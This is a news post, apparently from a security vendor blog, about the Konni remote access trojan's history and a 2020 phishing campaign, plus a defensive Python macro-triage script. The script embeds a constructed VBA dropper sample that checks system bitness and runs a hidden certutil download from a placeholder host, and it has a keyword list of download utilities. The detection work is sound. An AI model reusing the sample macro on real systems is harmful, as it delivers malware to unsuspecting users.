After remaining largely unnoticed for over three years, the Konni remote access trojan (RAT) has sprung back into action. According to the US Cybersecurity and Infrastructure Security Agency (CISA), the RAT has been active since 2014, but it has only recently begun attracting attention again.
The Backstory –
The Konni operators appear to have a particular interest in North Korea, as researchers have observed in the past:
- In January 2020, a US government agency was targeted with Konni and associated malware, allegedly in connection with ongoing geopolitical tensions surrounding North Korea.
- In 2017, a Konni campaign targeted the United Nations, UNICEF, and embassies linked to North Korea. Various organizations in North Korea were also targeted using the Inexsmar malware, with lures based on North Korean affairs.
- In October 2018, researchers found links between the KONNI and NOKKI malware families. They also found a link between KONNI attacks and the DarkHotel campaigns against North Korea of August 2017.
What Transpired Recently?
In August 2020, a new wave of phishing attacks was found delivering the Konni RAT to victims.
- Apart from stealing credentials from major browsers, the malware can log keystrokes, steal files, capture screenshots, and collect information about the infected system.
- Microsoft Word documents are weaponized with malicious Visual Basic for Applications (VBA) macro code that deploys the KONNI malware.
- The macro changes the document's font color from light grey to black (to trick the victim into enabling content), checks whether the Windows installation is 32-bit or 64-bit, and runs commands to download additional files.
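As an added example (not code from the original post or from the CISA alert), the following Python script triages extracted VBA macro source for the three behaviours listed above: a font-colour change at auto-open, a 32/64-bit check, and a shell command that fetches a second stage. The macro text it scans is constructed for this example; it is not the Konni macro, and the URLs, file names and indicator names in it are placeholders. In practice the source would come from a macro extractor such as olevba, which is not needed to run this script.

```python
"""Triage extracted VBA macro source for macro-dropper tells.

Looks for: an auto-execution entry point, a font-colour change (used to
reveal lure text once macros run), an OS bitness check, shell execution,
and well-known living-off-the-land download utilities.
"""
import re
from dataclasses import dataclass, field

# VBA is case-insensitive, so every pattern is compiled with re.I.
INDICATORS = [
    ("auto_execution",
     re.compile(r"\b(?:AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I)),
    ("font_color_change",
     re.compile(r"\bFont\.(?:Color|ColorIndex)\s*=", re.I)),
    ("os_bitness_check",
     re.compile(r'Environ\s*\(\s*"PROCESSOR_ARCHITE(?:CTURE|W6432)"\s*\)'
                r"|Is64BitOperatingSystem|\bWin64\b", re.I)),
    ("shell_execution",
     re.compile(r"\bShell\b|CreateObject\s*\(", re.I)),
    ("download_utility",
     re.compile(r"\b(?:certutil|bitsadmin|powershell|curl|wget|mshta|regsvr32)\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


@dataclass
class MacroReport:
    hits: dict = field(default_factory=dict)   # indicator -> line numbers
    urls: list = field(default_factory=list)   # URLs seen in string literals

    @property
    def suspicious(self) -> bool:
        # Execution plus at least two supporting tells; a lone Shell call
        # in a legitimate automation macro should not fire.
        return "shell_execution" in self.hits and len(self.hits) >= 3


def triage_macro(source: str) -> MacroReport:
    """Scan macro source line by line and record which indicators fire where."""
    report = MacroReport()
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                report.hits.setdefault(name, []).append(lineno)
        report.urls.extend(URL_RE.findall(line))
    return report


# Constructed sample in the style described in the text: hidden text is
# revealed, bitness is checked, and a download command is run. Not the
# real Konni macro; example.invalid is a reserved, non-resolving domain.
SAMPLE_MACRO = r"""Sub AutoOpen()
    ' Reveal the hidden lure text once the victim has enabled macros
    ActiveDocument.Content.Font.Color = wdColorBlack
    Dim arch As String
    arch = Environ("PROCESSOR_ARCHITECTURE")
    Dim url As String
    If arch = "AMD64" Then
        url = "http://example.invalid/stage2_x64.txt"
    Else
        url = "http://example.invalid/stage2_x86.txt"
    End If
    Dim cmd As String
    cmd = "cmd /c certutil -urlcache -split -f " & url & " %TEMP%\s.txt"
    Shell cmd, vbHide
End Sub
"""

# Constructed benign macro: formatting only, no execution or download.
BENIGN_MACRO = """Sub FormatHeading()
    Selection.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        rep = triage_macro(src)
        print(f"{label}: suspicious={rep.suspicious}")
        for name, lines in rep.hits.items():
            print(f"  {name}: lines {lines}")
        for url in rep.urls:
            print(f"  url: {url}")
```

The verdict deliberately requires shell execution plus two other tells, because a font-colour change or an architecture check on its own is common in legitimate document automation; the URLs and the line numbers of each hit are what an analyst would pivot on next (block the URL, then read the macro around those lines).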
Warning from the CISA
CISA published an alert about these recent attacks delivering the Konni trojan.
- The alert also lists MITRE ATT&CK techniques associated with the Konni RAT and provides Snort signatures for detecting Konni malware activity.
- To strengthen the security posture of their organization's systems, it recommends that users and administrators follow best practices.
The Konni malware appears to be geared towards espionage against targets with an interest in North Korean affairs, in addition to organizations in the US. Researchers expect new links with other malware families, or new KONNI variants with additional capabilities and better ways of evading detection.
To read more, please see the eScan Blog.